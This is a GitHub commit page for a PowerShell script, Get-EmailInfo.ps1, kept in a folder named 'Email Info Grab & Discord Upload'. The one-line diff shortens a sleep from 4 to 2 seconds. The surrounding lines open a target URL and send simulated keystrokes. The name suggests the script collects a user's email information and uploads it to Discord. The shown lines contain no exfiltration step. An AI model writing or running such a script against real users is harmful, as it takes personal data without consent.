Skip to content

Commit fd0dec9

Browse files
authored
Update Get-EmailInfo.ps1
1 parent 2c76b9c commit fd0dec9

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Email Info Grab & Discord Upload/Get-EmailInfo.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ function Get-EmailInfo {
55

66
Start-Process $targetURL
77

8-
Start-Sleep -Seconds 4
8+
Start-Sleep -Seconds 2
99

1010
[System.Windows.Forms.SendKeys]::SendWait("{DOWN 8}")
1111

0 commit comments

Comments
 (0)